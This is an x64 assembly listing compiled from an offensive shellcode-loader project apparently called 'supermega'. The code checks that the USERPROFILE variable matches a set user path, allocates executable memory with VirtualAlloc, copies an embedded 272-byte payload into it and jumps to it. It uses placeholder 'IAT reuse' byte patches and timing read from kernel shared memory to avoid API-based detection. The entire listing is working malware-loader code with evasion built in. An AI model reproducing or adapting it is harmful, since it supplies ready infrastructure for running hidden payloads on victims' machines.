; Listing generated by Microsoft (R) Optimizing Compiler Version 19.37.32822.0 include listing.inc ; INCLUDELIB LIBCMT ; INCLUDELIB OLDNAMES _DATA SEGMENT COMM supermega_payload:QWORD _DATA ENDS PUBLIC get_time_raw PUBLIC sleep_ms PUBLIC main PUBLIC mystrcmp ; EXTRN __imp_GetEnvironmentVariableW:PROC ; EXTRN __imp_VirtualAlloc:PROC _DATA SEGMENT $SG72751 DB 'U', 00H, 'S', 00H, 'E', 00H, 'R', 00H, 'P', 00H, 'R', 00H DB 'O', 00H, 'F', 00H, 'I', 00H, 'L', 00H, 'E', 00H, 00H, 00H $SG72752 DB 'C', 00H, ':', 00H, '\', 00H, 'U', 00H, 's', 00H, 'e', 00H DB 'r', 00H, 's', 00H, '\', 00H, 'h', 00H, 'a', 00H, 'c', 00H, 'k' DB 00H, 'e', 00H, 'r', 00H, 00H, 00H _DATA ENDS PUBLIC AlignRSP _TEXT SEGMENT AlignRSP PROC and rsp, 0FFFFFFFFFFFFFFF0h ; Align RSP to 16 bytes call main ; Call the entry point of the payload AlignRSP ENDP _TEXT ENDS _TEXT SEGMENT i$ = 0 str1$ = 32 str2$ = 40 mystrcmp PROC ; File C:\Users\hacker\source\repos\supermega\projects\Verify_1\main.c ; Line 58 $LN6: mov QWORD PTR [rsp+16], rdx mov QWORD PTR [rsp+8], rcx sub rsp, 24 ; Line 59 mov DWORD PTR i$[rsp], 0 $LN2@mystrcmp: ; Line 60 movsxd rax, DWORD PTR i$[rsp] mov rcx, QWORD PTR str1$[rsp] movzx eax, WORD PTR [rcx+rax*2] test eax, eax je SHORT $LN3@mystrcmp movsxd rax, DWORD PTR i$[rsp] mov rcx, QWORD PTR str2$[rsp] movzx eax, WORD PTR [rcx+rax*2] test eax, eax je SHORT $LN3@mystrcmp ; Line 61 movsxd rax, DWORD PTR i$[rsp] mov rcx, QWORD PTR str1$[rsp] movzx eax, WORD PTR [rcx+rax*2] movsxd rcx, DWORD PTR i$[rsp] mov rdx, QWORD PTR str2$[rsp] movzx ecx, WORD PTR [rdx+rcx*2] cmp eax, ecx je SHORT $LN4@mystrcmp ; Line 62 mov eax, 1 jmp SHORT $LN1@mystrcmp $LN4@mystrcmp: ; Line 64 mov eax, DWORD PTR i$[rsp] inc eax mov DWORD PTR i$[rsp], eax ; Line 65 jmp SHORT $LN2@mystrcmp $LN3@mystrcmp: ; Line 66 xor eax, eax $LN1@mystrcmp: ; Line 67 add rsp, 24 ret 0 mystrcmp ENDP _TEXT ENDS ; Function compile flags: /Odtp _TEXT SEGMENT n$1 = 32 result$ = 36 dest$ = 40 envVarName$ = 48 tocheck$ = 72 buffer$ = 112 main PROC ; File C:\Users\hacker\source\repos\supermega\projects\Verify_1\main.c ; Line 23 $LN8: push rsi push rdi sub rsp, 2168 ; 00000878H ; Line 29 lea rax, QWORD PTR envVarName$[rsp] DB 024H, 0d1H, 0b7H, 05aH, 004H, 04cH, 020H ; .rdata Reuse for $SG72751 (rcx) mov rdi, rax mov rsi, rcx mov ecx, 24 rep movsb ; Line 30 lea rax, QWORD PTR tocheck$[rsp] DB 01cH, 088H, 026H, 0deH, 0f0H, 0d2H, 0d4H ; .rdata Reuse for $SG72752 (rcx) mov rdi, rax mov rsi, rcx mov ecx, 32 ; 00000020H rep movsb ; Line 32 mov r8d, 1024 ; 00000400H lea rdx, QWORD PTR buffer$[rsp] lea rcx, QWORD PTR envVarName$[rsp] DB 06fH, 0c8H, 0f2H, 0e0H, 041H, 089H ; IAT Reuse for GetEnvironmentVariableW mov DWORD PTR result$[rsp], eax ; Line 33 cmp DWORD PTR result$[rsp], 0 jne SHORT $LN5@main ; Line 34 mov eax, 6 jmp SHORT $LN1@main $LN5@main: ; Line 36 lea rdx, QWORD PTR tocheck$[rsp] lea rcx, QWORD PTR buffer$[rsp] call mystrcmp test eax, eax je SHORT $LN6@main ; Line 37 mov eax, 6 jmp SHORT $LN1@main $LN6@main: ; Line 42 mov r9d, 64 ; 00000040H mov r8d, 12288 ; 00003000H mov edx, 272 ; 00000110H xor ecx, ecx DB 078H, 00eH, 02fH, 0edH, 0fbH, 0c4H ; IAT Reuse for VirtualAlloc mov QWORD PTR dest$[rsp], rax ; Line 47 mov DWORD PTR n$1[rsp], 0 jmp SHORT $LN4@main $LN2@main: mov eax, DWORD PTR n$1[rsp] inc eax mov DWORD PTR n$1[rsp], eax $LN4@main: cmp DWORD PTR n$1[rsp], 272 ; 00000110H jge SHORT $LN3@main ; Line 48 movsxd rax, DWORD PTR n$1[rsp] movsxd rcx, DWORD PTR n$1[rsp] mov rdx, QWORD PTR dest$[rsp] lea rdi, [shcstart] ; get payload shellcode address movzx eax, BYTE PTR [rdi+rax] mov BYTE PTR [rdx+rcx], al ; Line 49 jmp SHORT $LN2@main $LN3@main: ; Line 53 call QWORD PTR dest$[rsp] ; Line 55 xor eax, eax $LN1@main: ; Line 56 add rsp, 2168 ; 00000878H pop rdi pop rsi ret 0 main ENDP _TEXT ENDS ; Function compile flags: /Odtp _TEXT SEGMENT start$ = 32 sleeptime$ = 64 sleep_ms PROC ; File C:\Users\hacker\source\repos\supermega\projects\Verify_1\main.c ; Line 17 $LN5: mov DWORD PTR [rsp+8], ecx sub rsp, 56 ; 00000038H ; Line 18 call get_time_raw mov DWORD PTR start$[rsp], eax $LN2@sleep_ms: ; Line 19 call get_time_raw sub eax, DWORD PTR start$[rsp] cmp eax, DWORD PTR sleeptime$[rsp] jae SHORT $LN3@sleep_ms jmp SHORT $LN2@sleep_ms $LN3@sleep_ms: ; Line 20 add rsp, 56 ; 00000038H ret 0 sleep_ms ENDP _TEXT ENDS ; Function compile flags: /Odtp _TEXT SEGMENT kernelTime$ = 0 PUserSharedData_TickCountMultiplier$ = 8 PUserSharedData_High1Time$ = 16 PUserSharedData_LowPart$ = 24 get_time_raw PROC ; File C:\Users\hacker\source\repos\supermega\projects\Verify_1\main.c ; Line 7 $LN3: sub rsp, 40 ; 00000028H ; Line 8 mov QWORD PTR PUserSharedData_TickCountMultiplier$[rsp], 2147352580 ; 7ffe0004H ; Line 9 mov QWORD PTR PUserSharedData_High1Time$[rsp], 2147353380 ; 7ffe0324H ; Line 10 mov QWORD PTR PUserSharedData_LowPart$[rsp], 2147353376 ; 7ffe0320H ; Line 11 mov rax, QWORD PTR PUserSharedData_High1Time$[rsp] mov eax, DWORD PTR [rax] shl eax, 8 mov rcx, QWORD PTR PUserSharedData_TickCountMultiplier$[rsp] mov ecx, DWORD PTR [rcx] imul ecx, eax mov eax, ecx mov eax, eax mov rcx, QWORD PTR PUserSharedData_LowPart$[rsp] mov ecx, DWORD PTR [rcx] mov rdx, QWORD PTR PUserSharedData_TickCountMultiplier$[rsp] mov edx, DWORD PTR [rdx] imul rcx, rdx shr rcx, 24 add rax, rcx mov DWORD PTR kernelTime$[rsp], eax ; Line 13 mov eax, DWORD PTR kernelTime$[rsp] ; Line 14 add rsp, 40 ; 00000028H ret 0 get_time_raw ENDP shcstart: ; start of payload shellcode _TEXT ENDS END